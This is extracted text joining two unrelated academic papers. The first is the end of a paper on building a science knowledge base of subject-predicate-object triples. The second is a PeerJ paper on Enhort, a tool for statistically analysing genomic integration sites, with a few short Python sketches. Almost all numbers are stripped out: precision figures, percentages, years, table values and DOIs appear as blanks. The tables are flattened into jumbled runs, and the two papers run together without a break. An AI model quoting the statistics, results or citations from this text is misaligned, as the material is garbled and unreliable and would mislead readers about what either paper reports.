metric. table shows that, before applying any canonical schema induction method, the comprehensiveness score of our kb was %. the amie* method improves this score to . %, whereas our method achieves a comprehensiveness of . %. this latter improvement over the original kb is statistically significant at the % confidence e.g., posed by a qa system trying to answer the question “which is the likely location in which a polar bear to reside in? (a) tundra (b) desert (c) grassland” level (sample size is the facts sampled from the reference corpus). . . canonical schema correctness a second metric of interest is the correctness of the schema mapping rules (just because comprehen- siveness improves does not imply every mapping rule is correct). we evaluate correctness of schema mapping rules using following metric: precision of schema mapping rules: we asked turkers to directly assess whether particular schema mapping rules were correct, for a random sample of rules. 
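the role of the mapping rules at query time can be pictured as a small rewrite-and-compare step; the rules table and the canonicalize helper below are hypothetical, only mirror the polar-bear example above, and are not part of the released system.

# typed schema mapping rules of the kind learned by the ILP, written out by hand
rules = {
    ("animal", "inhabit", "location"):   ("animal", "live in", "location"),
    ("animal", "reside in", "location"): ("animal", "live in", "location"),
}

def canonicalize(triple, schema_of, rules):
    # rewrite a fact triple to its canonical schema if a mapping rule applies
    subj, rel, obj = triple
    schema = (schema_of[subj], rel, schema_of[obj])
    canon = rules.get(schema, schema)          # identity when no rule fires
    return (subj, canon[1], obj)

schema_of = {"polar bear": "animal", "tundra": "location"}
kb_fact = ("polar bear", "inhabit", "tundra")
query = ("polar bear", "reside in", "tundra")
print(canonicalize(kb_fact, schema_of, rules) == canonicalize(query, schema_of, rules))   # True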
to make the task clear, turkers were shown the schema mapping rule (expressed in en- glish) along with an example fact that was rewrit- ten using that rule (to give a concrete example of its use), and they were asked to select one option “correct or incorrect or unsure” for each rewrite rule. we asked this question to three different turkers and considered the majority vote as final evaluation . the comparison results are shown in table . starting with . k schemas, amie* canonicalized only of those into canonical schemas (using schema mapping rules). in contrast, our method casi canonicalized . k schemas into . k canon- ical schemas. we randomly sampled schema mapping rules generated by each method and asked turkers to evaluate their correctness, as described earlier. as shown in table , the precision of rules produced was casi is %, compared with amie* which achieved % on this metric. thus casi could canonicalize five times more schemas with % more precision. . discussion and future work next, we identify some of the limitations of our ap- proach and directions for future work. . extracting richer representations of knowl- edge: while triples can capture certain kinds of knowledge, there are other kinds of information, e.g. detailed descriptions of events or processes, that cannot be easily represented by a set of independent tuples. an extension of this work would be to extract event frames, capable of representing a richer set of we discarded the unsure votes. for more than % of the rules, at least out of turkers reached clear consensus on whether the rule is “correct vs. incorrect”, indicating that the turker task was clearly defined. canonical schema #input #schema #induced precision of induction method schemas mapping rules canonical schemas schema mapping rules amie* . k % casi (our method) . k . k . k % table : casi canonicalizes five times more schemas than amie*, and also achieves a small ( %) increase in preci- sion, demonstrating how additional knowledge resources can help the canonicalization process (section . ). precision estimates are within +/- % with % confidence interval. roles in a wider context compared to a triple fact. for example in the news domain, while representing an event “public shooting”, one would like to store the shooter, victims, weapon used, date, time, loca- tion and so on. building high-precision extraction techniques that can go beyond binary relations to- wards event frames is a potential direction of future research. . richer kb organization: our approach or- ganizes entities and relations into flat entity types and schema clusters. an immediate direction for ex- tending this work could be a better kb organization with deep semantic hierarchies for predicates and ar- guments, allowing inheritance of knowledge among entities and triples. . improving comprehensiveness beyond %: our comprehensiveness score is currently at % in- dicating % of potentially useful science facts are still missing from our kb. there are multiple ways to improve this coverage including but not limited to ) processing more science corpora through our extraction pipeline, ) running standard kb com- pletion methods on our kb to add the facts that are likely to be true given the existing facts, and ) im- proving our canonical schema induction method fur- ther to avoid cases where the query fact is present in our kb but with a slight linguistic variation. . 
quantification sharpening: similar to other kbs, our tuples have the semantics of plausibility: if the fact is generally true for some of the arg s, then score it as true. although frequency filtering typically removes facts that are rarely true for the arg s, there is still variation in the quantifier strength of facts (i.e., does the fact hold for all, most, or some arg s?) that can affect downstream inference. we are exploring methods for quantification sharpening, e.g., (gordon and schubert, ), to address this. . can the pipeline be easily adapted to a new domain? our proposed extraction pipeline expects high-quality vocabulary and types information as input. in many domains, it is easy to import types from existing resources like wordnet or freebase. for other domains like medicine, legal it might require domain experts to encode this knowledge. however, we believe that manually encoding types is a much simpler task as compared to manually defining all the schemas relevant for an individual domain. further, various design choices, e.g., precision vs. recall tradeoff of final kb, the amount of expert input available, etc. would depend on the domain and end task requirements. conclusion our goal is to construct, a domain-targeted, high precision knowledge base of (sub- ject,predicate,object) triples to support an ele- mentary science application. we have presented a scalable knowledge extraction pipeline that is able to extract a large number of facts targeted to a particular domain. the pipeline leveraging open ie, crowdsourcing, and a novel schema learning algorithm, and has produced a kb of over , facts at . % precision for elementary science qa. we have also introduced a metric of comprehen- siveness for measuring kb coverage with respect to a particular domain. applying this metric to our kb, we have achieved a comprehensiveness of over % of science facts within the kb’s expressive power, substantially higher than the science coverage of other comparable resources. most importantly, the pipeline offers for the first time a viable way of ex- tracting large amounts of high-quality knowledge targeted to a specific domain. we have made the kb publicly available at http://data.allenai. org/tuple-kb. acknowledgments we are grateful to paul allen whose long-term vision continues to inspire our scientific endeav- ors. we would also like to thank peter turney and isaac cowhey for their important contributions to this project. references s. auer, c. bizer, j. lehmann, g. kobilarov, r. cyga- niak, and z. ives. . dbpedia: a nucleus for a web of open data. in in iswc/aswc. michele banko, michael j. cafarella, stephen soderland, matthew broadhead, and oren etzioni. . open information extraction from the web. in ijcai, vol- ume , pages – . jonathan berant, ido dagan, and jacob goldberger. . global learning of typed entailment rules. in acl. kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a collabo- ratively created graph database for structuring human knowledge. in sigmod. thorsten brants and alex franz. . web t - gram version ldc t . philadelphia: linguis- tic data consortium. andrew carlson, justin betteridge, bryan kisiel, burr settles, estevam r hruschka jr, and tom m mitchell. . toward an architecture for never-ending lan- guage learning. in aaai, volume , page . bhavana dalvi, sumithra bhakthavatsalam, chris clark, peter clark, oren etzioni, anthony fader, and dirk groeneveld. . ike - an interactive tool for knowledge extraction. in akbc@naacl-hlt. 
luciano del corro, rainer gemulla, and gerhard weikum. . werdy: recognition and disambigua- tion of verbs and verb phrases with syntactic and se- mantic pruning. in conference on empirical methods in natural language processing, pages – . acl. karthik dinakar, birago jones, catherine havasi, henry lieberman, and rosalind picard. . common sense reasoning for detection, prevention, and mitiga- tion of cyberbullying. acm transactions on interac- tive intelligent systems (tiis), ( ): . xin dong, evgeniy gabrilovich, geremy heitz, wilko horn, ni lao, kevin murphy, thomas strohmann, shaohua sun, and wei zhang. . knowledge vault: a web-scale approach to probabilistic knowl- edge fusion. in kdd. alexander faaborg and henry lieberman. . a goal- oriented web browser. in proceedings of the sigchi conference on human factors in computing systems, pages – . acm. anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information ex- traction. in proceedings of the conference on empiri- cal methods in natural language processing, pages – . association for computational linguis- tics. reverb- m available at http://openie. cs.washington.edu. christiane fellbaum. . wordnet. wiley online li- brary. luis galárraga, christina teflioudi, katja hose, and fabian m. suchanek. . amie: association rule mining under incomplete evidence in ontological knowledge bases. in www. luis galárraga, geremy heitz, kevin murphy, and fabian m. suchanek. . canonicalizing open knowledge bases. in cikm. jonathan gordon and lenhart k schubert. . quan- tificational sharpening of commonsense knowledge. in aaai fall symposium: commonsense knowledge. adam grycner and gerhard weikum. . harpy: hy- pernyms and alignment of relational paraphrases. in coling. adam grycner, gerhard weikum, jay pujara, james r. foulds, and lise getoor. . relly: inferring hy- pernym relationships between relational phrases. in emnlp. dekang lin and patrick pantel. . dirt - discov- ery of inference rules from text. in proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining, pages – . acm. hugo liu and push singh. . conceptnet: a prac- tical commonsense reasoning tool-kit. bt technology journal, ( ): – . mausam, michael schmitz, stephen soderland, robert bart, and oren etzioni. . open language learning for information extraction. in emnlp. andrea moro and roberto navigli. . wisenet: building a wikipedia-based semantic network with on- tologized relations. in cikm. patrick pantel, rahul bhagat, bonaventura coppola, timothy chklovski, and eduard h hovy. . isp: learning inferential selectional preferences. in hlt- naacl, pages – . hannes planatscher and michael schober. . scp solver. http://scpsolver.org. simon razniewski, fabian m suchanek, and werner nutt. . but what do we actually know? in proc. akbc’ . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in hlt- naacl. richard socher, danqi chen, christopher d. manning, and andrew y. ng. . reasoning with neural ten- sor networks for knowledge base completion. in nips. stephen soderland, john gilmer, robert bart, oren et- zioni, and daniel s. weld. . open information extraction to kbp relations in hours. in tac. robert speer and catherine havasi. . concept- net : a large semantic network for relational knowl- edge. in the peoples web meets nlp, pages – . springer. gabriel stanovsky and ido dagan. . 
creating a large benchmark for open information extraction. in emnlp. fabian m. suchanek, gjergji kasneci, and gerhard weikum. . yago: a core of semantic knowl- edge. in www. niket tandon, gerard de melo, fabian suchanek, and gerhard weikum. . webchild: harvesting and organizing commonsense knowledge from the web. in wsdm. peter d. turney, yair neuman, dan assaf, and yohai co- hen. . literal and metaphorical sense identifica- tion through concrete and abstract context. in emnlp. travis wolfe, mark dredze, james mayfield, paul mc- namee, craig harman, timothy w. finin, and ben- jamin van durme. . interactive knowledge base population. corr, abs/ . . alexander yates and oren etzioni. . unsupervised methods for determining object and relation synonyms on the web. journal of artificial intelligence research. submitted november accepted may published june corresponding author andreas gogol-döring, andreas.gogol-doering@mni.thm.de academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright menzel et al. distributed under creative commons cc-by . open access enhort: a platform for deep analysis of genomic positions michael menzel, peter koch, stefan glasenhardt and andreas gogol-döring mni, technische hochschule mittelhessen—university of applied sciences, giessen, hessen, germany abstract the rise of high-throughput methods in genomic research greatly expanded our knowledge about the functionality of the genome. at the same time, the amount of available genomic position data increased massively, e.g., through genome-wide profiling of protein binding, virus integration or dna methylation. however, there is no specialized software to investigate integration site profiles of virus integration or transcription factor binding sites by correlating the sites with the diversity of available genomic annotations. here we present enhort, a user-friendly software tool for relating large sets of genomic positions to a variety of annotations. it functions as a statistics based genome browser, not focused on a single locus but analyzing many genomic positions simultaneously. enhort provides comprehensive yet easy-to-use methods for statistical analysis, visualization, and the adjustment of background models according to experimental conditions and scientific questions. enhort is publicly available online at enhort.mni.thm.de and published under gnu general public license. subjects bioinformatics, computational biology keywords virology, data analysis, genome annotation, next-generation sequencing, integration profiling introduction some viruses like hiv (craigie & bushman, ) and aav (deyle & russell, ) are able to copy their genomic sequence into the genome of an infected cell. this can have severe impact on host cell stability as the integration may hit and disable a gene or a regulatory region. the investigation of characteristics and underlying driving factors for virus integration is not only relevant for virology and infectious diseases research but also for approaches in gene therapy that apply virus-derived vectors and transposons to deliver functional dna fragments into host cells (riviere, dunbar & sadelain, ; li et al., ). each gene delivery system has its own mechanisms for genomic integration and preferences for choosing integration sites, hence different systems may have different risks for causing undesired side effects. 
next generation sequencing (ngs) facilitates the genome-wide profiling of integration sites, as they are collected, e.g., in investigations of protein binding, virus/transposon integration or dna methylation. integration sites are available from databases like the retrovirus integration database (shao et al.) and are regularly created for novel targeted vectors. typically, the identified sites are related to a variety of genomic features, and any integration preferences are determined by a comparison of the actual integration sites to a set of random control sites (gogol-döring et al.). a proper background model should mimic all known biases of the signal data originating from experimental or laboratory conditions. if, for example, a profiling method is only capable of detecting integration events that are close to certain enzyme restriction sites, then the control sites should also be selected accordingly. several tools have been published that are capable of processing genomic positions and annotations, like the genomic hyperbrowser (sandve et al.). genome browsers like the ucsc genome browser (kent et al.), igv (robinson et al.) or artemis (carver et al.) are designed for inspecting single genomic locations. custom-written scripts are also commonly used for the analysis of genomic positions (cook et al.), as are libraries like pybedtools (janovitz et al.; dale, pedersen & quinlan). once written, such scripts have the benefit of being a reusable option for conducting a specific set of analyses on recurring data. however, they are limited by the available functionality, because each function has to be newly developed. additionally, comparability across laboratories is hampered by varying functionality and different implementations of background models. there is as yet no specialized tool for the analysis of genomic positions that combines instant analysis with user-defined, adaptable background models that mimic known biases. in this paper we present enhort, a user-friendly web platform for deep analysis of large sets of genomic positions. our aim is to accelerate and simplify the data analysis process as well as to standardize it in order to increase reproducibility. enhort is capable of adjusting the background sites used for comparison according to user-selected covariates. these include annotation tracks like restriction sites or chromatin accessibility, gene expression tracks, and sequence motifs. with covariates it is possible to adjust the selection of background sites so that they match the investigated sites for a specific track; this adaptation rules out the effect of that annotation on the background. the feature can be used to adjust for experimental bias as well as for specific scientific questions. the schematic process of data gathering and the usage of enhort in the workflow of analyzing genomic positions is shown in the overview figure.
methods
integration sites of viruses are gathered by sequencing infected cells and preprocessing the reads as shown in the overview figure.
these sites are uploaded to enhort and intersected with each annotation file to compute fold-change enrichment and a χ² test against the control sites, yielding a measure of effect strength and of significance for each annotation, respectively. the analysis pathway for sites uploaded by a user is shown schematically in a separate figure. statistical analysis depends on the apache commons math library (https://commons.apache.org/proper/commons-math/) and uses bonferroni correction for multiple hypothesis testing. the libraries plotly.js (https://plot.ly/javascript/) and circos (http://circos.ca/) are used for visualization. the results are sorted according to their relevance and presented in conjunction with appropriate figures; example results for a virus can be seen in panel (a) of the output view figure. the software has been designed in such a way that analysis results are almost immediately available after upload. in many cases a background model consisting of random sites is not sufficient for an adequate analysis. some protocols, for example, can only detect integration events that occurred in close proximity to a restriction site of a specific enzyme, like ecori, which cuts inside gaattc hexamers (pingoud & jeltsch). background models should be adapted to mimic the actual integration pattern with regard to any known technical bias. in this case, the control sites should also be selected to be near restriction sites. this can be achieved in enhort by setting the appropriate genome annotation as a covariate. when the track containing all possible genomic positions of gaattc hexamers is selected as a covariate, enhort will generate a set of control sites having exactly the same distribution of distances to the enzyme restriction sites as the actual virus integration sites.
figure: overview of preparatory work and data gathering for analysis in enhort. reads containing viral integration sites are identified and sequenced in the wet lab and mapped to a reference genome; the identified insertion sites are converted to a bed file for use in enhort; together with genomic annotations from public databases, the analysis of the given integration sites is then conducted in enhort.
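the per-annotation statistics described above can be sketched in a few lines of python with scipy (enhort itself uses the apache commons math library); the function name, the count arguments and the example numbers below are illustrative assumptions.

from scipy.stats import chi2_contingency

def annotation_enrichment(user_in, user_total, bg_in, bg_total, n_tracks):
    # 2x2 contingency table: sites inside/outside the annotation, user vs background
    table = [[user_in, user_total - user_in],
             [bg_in, bg_total - bg_in]]
    _, p, _, _ = chi2_contingency(table)
    fold_change = (user_in / user_total) / (bg_in / bg_total)
    return fold_change, min(1.0, p * n_tracks)   # Bonferroni-corrected p value

# e.g. 400 of 1,000 integrations vs 250 of 1,000 control sites inside one track,
# with 50 annotation tracks tested overall
print(annotation_enrichment(400, 1000, 250, 1000, 50))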
figure: flowchart of the procedure of analysis performed by enhort (upload of user sites, selection of covariates, generation of background sites for each covariate combination, counting of user and background sites inside annotation intervals, contingency table, χ² test with correction for multiple testing and fold change, followed by tables, figures and export of the results). blue boxes show the steps to create a background model based on multiple covariates; random positions have to be set for each combination of covariates. green boxes show the steps to test the user sites against the background sites. the results are returned as a table and converted into figures for the user.
covariates help to adapt the background model both for technical circumstances, for example restriction sites, and for eliminating a bias or biological preference such as motifs or genetic features. covariates can also be used to identify dependent or separate weak integration preferences that are covered by stronger effects, as shown in panel (b) of the output view figure: mlv integration sites are compared to two different control sets, a random and an altered background, to identify the actual integration preferences, e.g., for the histone mark h k me, which is a known preference of mlv (gogol-döring et al.). for the validity of statistical testing it is usually indispensable to normalize the background model relative to multiple covariates. for that purpose, enhort supports the selection of multiple covariates simultaneously in order to further investigate the integration site characteristics. for example, enhort may create a control set that considers chromatin accessibility, restriction site distance, as well as several histone modifications simultaneously. this functionality is needed to build background models for sites that are influenced by multiple factors, e.g., biological and technical biases. a set of additional features is listed below:
1. statistical analysis for annotation tracks: (a) fold change, (b) χ² test, (c) kolmogorov–smirnov test
2. hotspot analysis (fig. c)
3. position-dependent enrichment (fig. a)
4. background models based on:
figure: output view example, generated by enhort when analyzing murine leukemia virus (mlv) integration sites in cd + t cells (roth, malani & bushman). (a) the results are presented in a table containing, for each annotation, the p value, the effect size and a visual representation of the integration; the annotations are ranked by effect strength. (b) effect of covariate selection: the upper diagram contains integration frequencies of mlv compared to random sites for a selection of annotations; this virus is known to integrate preferentially near transcription start sites (tss) and h k me histone marks (lafave et al.); the lower diagram shows the same data after selecting h k me as covariate.
the adapted background model is generated in a way that control sites and mlv integration sites have the same frequency relative to h k me . this also changed the control site frequencies for other annotations: mlv integration is no longer enriched but depleted in cpg islands when compared to the adapted back- ground model. full-size doi: . /peerjcs. /fig- (a) inside and outside of annotations (b) distance to annotations (c) scored annotations (d) sequence logo . upload background sites . comparing effects of different background models . batch analysis of multiple integration sets . heatmaps to compare integration sets (fig. b) . custom annotation tracks . blend annotation tracks . export results as r code and csv files enhort is separated into a lightweight, web-based user interface and a high performance back-end server attached to a sqlite database storing meta-information about the annotations fetched from deepblue (albrecht et al., ). results from enhort are instantaneously available as seen in table where the run times for different input sizes are shown. our application currently offers annotation tracks from cell menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table analysis execution times for different usual site counts, annotation tracks from hg and co- variate counts. (back-end server: supermicro superserver b-trft x intel xeon e - v with gb ddr ecc lr). track count , covariate count site count execution time (ms) k , , , , , k , , , , , k , , , , k , , , , k , , , , k , , , , lines and tissues for human genome assemblies hg and hg , downloaded from ucsc genome browser (fujita et al., ), encode (encode project consortium, ), chip-atlas (http://chip-atlas.org), blueprint epigenome (adams et al., ) and roadmap epigenomics (roadmap epigenomics consortium et al., ) using the deepblue epigenomic data server (albrecht et al., ). results and discussion literature review we reviewed the relevance of enhort for contemporary research by systematically searching pubmed, google scholar, and several review articles for publications concerning the analysis of genomic integration sites. the publications include virus integration site analysis for hiv, mlv, hrp- , siv, foamy virus, hpv, aav and transposons such as piggybac, line- , alu and sleeping beauty. in total we identified relevant publications. details on the reviewed publications and methodological analysis are available in the table s . of these publications used completely random control sites, only six used adapted control sites. the data analyses presented in ( %) publications could have been entirely performed with our tool. six further publications use at least some methods provided by enhort. we assume that if they had the opportunity to use enhort the authors would have saved a lot of effort writing custom analysis scripts. data re-analysis to further present the capabilities of enhort we re-analyzed integration sites of the piggybac transposon (pb) published by gogol-döring et al. ( ) using enhort. results from wilson, coates & george ( ) are used for comparison. pb integration characteristics show a preference for genes, exons, introns, highly expressed genes, dnase i hypersensitive sites, h k me and open chromatin structures (wilson, coates & george, ; li et al., ). we uploaded the pb integration sites to enhort, selected all relevant tracks and finally exported the results. 
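the covariate-adjusted background generation can be approximated, for a single numeric covariate such as distance to the nearest gaattc site, by weighting pre-sampled candidate positions so that their covariate distribution matches that of the uploaded sites. the numpy sketch below is a simplified stand-in for enhort's background model generation; the function name, the histogram-matching scheme and the assumption of numpy-array inputs are all illustrative.

import numpy as np

def matched_background(user_cov, candidate_pos, candidate_cov, n_sites, bins=50, seed=0):
    # user_cov: covariate value per uploaded site (e.g. distance to nearest GAATTC hexamer)
    # candidate_pos / candidate_cov: pre-sampled genomic positions and their covariate values
    rng = np.random.default_rng(seed)
    edges = np.histogram_bin_edges(np.concatenate([user_cov, candidate_cov]), bins=bins)
    target, _ = np.histogram(user_cov, bins=edges, density=True)
    bin_of = np.digitize(candidate_cov, edges[1:-1])     # bin index of every candidate
    weights = target[bin_of]                             # weight candidates by user-site density
    weights = weights / weights.sum()
    picked = rng.choice(len(candidate_pos), size=n_sites, replace=False, p=weights)
    return candidate_pos[picked]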
figure a shows the log fold changes for a selection of annotations for pb against a random background in grey. figure b shows the sequence logos for the menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://chip-atlas.org http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure additional plots generated by enhort. (a) circos plot (krzywinski et al., ) of position de- pendent enrichment over all chromosomes for mlv for the most significant tracks. (b) heatmap for a set of three integration data sets against various annotations. the values are log -fold changes of the numbers of integration vs control sites falling into a given annotation. star symbols mark statistically significant changes. the same background sites are used for the comparisons. the background sites are adapted to in- tegrate only inside the sequence contigs. (c) integration hotspots across the genome for mlv. the color intensity of the thin bars show the integration ratio inside of the respective genomic region. full-size doi: . /peerjcs. /fig- pb integration sites and the random background. the barplots were created using the r-export feature of enhort. the key feature of the pb integration preference is the ttaa motif in which all integrations occur. to precisely analyze the preferences of pb integration the background model has to be adapted to replicate the ttaa motif preference. this can be achieved using enhort by creating a set of pseudo-random control sites that are located only inside a ttaa sequence. to achieve this, we simply selected the sequence logo as a covariates. enhort takes genomic positions from a pre-sampled set of positions where each position has a probability based on the similarity between the surrounding sequence and the ttaa sequence. the results are shown in fig. c where the background sites and pb show a similar motif after the motif is added as a covariate using enhort. the motif adaption also changes the observed integration characteristics seen in fig. a. the relative decreased integration of pb into coding exons is changed to a significant preference, because cpg islands are less likely to be hit by a site from the adapted background model, as ttaa occurs relatively less frequent in cpg islands. the same applies to dnase cluster regions, tss and exons, where the significance of integration is enriched in comparison to a random background. only a small change for the enrichment in introns and genes is visible. overall menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure analysis of pb integration sites. (a) log fold changes of pb integration sites in relation to sev- eral annotations against a random and an adapted background model. changing the background model to adapt the ttaa motif changes the observation of several integration preferences. (b) the pb motif and random sites motif, corresponding with the random background bars in (a). (c) motif of the random sites after adaption to the pb motif using enhort. full-size doi: . /peerjcs. /fig- table log fold changes and integration ratios of wilson, coates & george ( ) in comparison to enhort for two pb integration site sets. enhort wilson et al. enhort wilson et al. enhort wilson et al. annotation track fold change fold change pb (%) pb (%) random (%) random (%) refseq genes . . . . . . tss (± kb) . . . . . . cpg islands (± kb) . . . . . . cpg islands (± kb) . . . . . . repeats: line . . . . . . 
sine . . . . . . ltr . . . . . . dna . . . . . . this indicates that beside the ttaa preference of pb there are additional mechanisms that alter the integration preferences. using the background adaption feature of enhort it would be possible to test different hypothesis against the data and build a model that explains the integration preferences. to further review the analytic capabilities of our software, the integration counts of pb sites are compared to published results from wilson, coates & george ( ). the comparison can be seen in table . an increased integration of pb into refseq genes, inside the kb-tss window, as well as a preference for cpg islands is observable for both analyses. wu et al. ( ) published a study on mlv and hiv stating that mlv favors tss regions, whereas hiv does not display a strong preference towards tss regions. the menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison between fold changes of wu et al. ( ) and enhort over different annotations on the same integration sites. wu et al. enhort hiv mlv hiv mlv hiva mlva hivb mlvb refseq genes . * . * . * . * housekeeping genes – – . * . . * . . * . cpg islands (± kb) * . . * . . * . . * tss (± kb) . * . * . . * . . * h k me – – . * . * . * . * . * . * h k me – – . . * . . * . . * h k ac – – . . * . . * . . * notes. *p < . . awith refseq genes as covariate. bwith refseq genes and tss (± kb) as covariates. available integration sites were uploaded to enhort and analyzed using the batch tool with a random , site background model. the results from enhort show a similar integration pattern as stated in wu et al. ( ) (table ). except for cpg islands for hiv where wu et al. found a near random integration and we found a decreased integration. for further review, hiv and mlv integration sites were uploaded independently to enhort, and refseq genes added as covariate. this background model had only a little effect on mlv as the preference for tss and cpg islands only changed slightly, indicating that the preference for tss is not due to a preference for refseq genes. for the hiv integration sites the housekeeping genes, which are a known preference of hiv (craigie & bushman, ), are still statistically significant against this background model. finally, refseq genes and tss (± kb) were both used as covariates together, showing that the integration ratio of mlv into cpg islands with a (± kb) window decreases slightly. this shows that the integration into the cpg islands is probably not a side effect of the preference for tss or genes. the combined background model with refseq genes and tss does not have any influence on the hiv fold changes compared to the previous background model. the creation of each background model and comparing the results was possible using built-in features of enhort. we further added histone modifications to the analysis showing that h k me is significantly enriched for both integration sets and does not change significantly for the different background models. this indicates that the histone modification preferences is an additional effect, only slightly influenced by the preference for genes and tss. h k me and h k ac are known preferences of mlv (de ravin et al., ) and show a high fold change for all background models. with the available database it would be easy to add numerous additional annotations for comparison. 
we have shown that enhort is capable of reproducing integration site analysis with less effort and additionally offers easy-to-use mechanisms to create more sophisticated analysis using adaptable background models. the exact annotation files were not available for comparison, so it was not possible to produce the exact numbers. however, enhort uses menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the same calculation principle. with the same annotations and sites the results by enhort would be the same as in the referenced publications. conclusion in this publication we present enhort, a fast and easy-to-use analyzing platform for genomic positions. based on a comprehensive library of genomic annotations, enhort provides a wide range of methods to analyze large sets of sites. in contrast to multi-purpose software such as bioconductor, enhort enables scientists to analyze data without programming effort or extensive manual work. our literature review shows that enhort is able to perform most of the analyses commonly used in the investigation of integration sites. the re-analysis of wilson, coates & george ( ) and wu et al. ( ) demonstrates that enhort is able to reproduce analyses from literature with little effort. it was not possible to reproduce the exact values, because the version of the annotation was not recorded in the publications. however, more detailed insights can be made using adaptable background models. this was shown in the comparison of hiv and mlv from wu et al. against different control sites. most publications use very simple background models for statistical analysis of integration data and could potentially be improved using better background models. enhort provides methods to easily create more sophisticated background models for improving both the accuracy and the range of possible analyses. complex background models can be used to identify weak effects and segregate driving factors for integration, find a minimal set of annotations to mimic integration characteristics, as well as to eliminate technical biases. in conclusion, this shows that enhort will be a valuable tool for further analyses of genomic positions, no matter if these positions are derived from virus integration, sequence motifs, enzyme restrictions, histone modifications, or protein binding. additional information and declarations funding this work was supported by the hessen state ministry for higher education, research and the arts. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: hessen state ministry for higher education, research and the arts. competing interests the authors declare there are no competing interests. author contributions • michael menzel conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • peter koch contributed reagents/materials/analysis tools, performed the computation work. • stefan glasenhardt contributed reagents/materials/analysis tools, performed the computation work. 
• andreas gogol-döring prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the source code and build instructions are available at https://git.thm.de/mmnz / enhort. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adams d, altucci l, antonarakis s, ballesteros j, beck s, bird a, bock c, boehm b, campo e, caricasole a, dahl f, dermitzakis e, enver t, esteller m, estivill x, ferguson-smith a, fitzgibbon j, flicek p, schacht c, willcocks s. . blueprint to decode the epigenetic signature written in blood. nature biotech- nology ( ): – doi . /nbt. . albrecht f, list m, bock c, lengauer t. . deepblue epigenomic data server: programmatic data retrieval and analysis of epigenome region sets. nucleic acids research (w ):w –w doi . /nar/gkw . carver t, harris sr, berriman m, parkhill j, mcquillan ja. . artemis: an inte- grated platform for visualization and analysis of high-throughput sequence-based ex- perimental data. bioinformatics ( ): – doi . /bioinformatics/btr . cook lucy b, melamed a, niederer h, valganon m, laydon d, foroni l, taylor gp, matsuoka m, bangham crm. . the role of htlv- clonality, proviral structure, and genomic integration site in adult t-cell leukemia/lymphoma. blood ( ): – doi . /blood- - - . craigie r, bushman fd. . hiv dna integration. cold spring harbor perspectives in medicine ( ):article doi . /cshperspect.a . dale rk, pedersen bs, quinlan ar. . pybedtools: a flexible python library for manipulating genomic datasets and annotations. bioinformatics ( ): – doi . /bioinformatics/btr . de ravin ss, su l, theobald n, choi u, macpherson jl, poidinger m, symonds g, pond sm, ferris al, hughes sh, hl m, x w. . enhancers are major targets for murine leukemia virus vector integration. journal of virology ( ): – doi . /jvi. - . menzel et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://git.thm.de/mmnz /enhort https://git.thm.de/mmnz /enhort http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /blood- - - http://dx.doi.org/ . /cshperspect.a http://dx.doi.org/ . /bioinformatics/btr http://dx.doi.org/ . /jvi. - http://dx.doi.org/ . /peerj-cs. deyle dr, russell dw. . adeno-associated virus vector integration. current opinion in molecular therapeutics ( ): – . encode project consortium. . the encode (encyclopedia of dna elements) project. science ( ): – doi . /science. . fujita pa, rhead b, zweig as, hinrichs as, karolchik d, cline ms, goldman m, barber gp, clawson h, coelho a, diekhans m, dreszer tr, giardine bm, harte ra, hillman-jackson j, hsu f, kirkup v, kuhn rm, learned k, li ch, meyer lr, pohl a, raney bj, rosenbloom kr, smith ke, haussler d, kent wj. . the ucsc genome browser database: update . nucleic acids research (suppl )d –d doi . /nar/gkq . gogol-döring a, ammar i, gupta s, bunse m, miskey c, chen wei, uckert w, schulz tf, izsvák z, ivics z. . genome-wide profiling reveals remarkable parallels between insertion site selection properties of the mlv retrovirus and the piggybac transposon in primary human cd + t cells. molecular therapy ( ): – doi . /mt. . . janovitz t, oliveira t, sadelain m, falck-pedersen e. . 
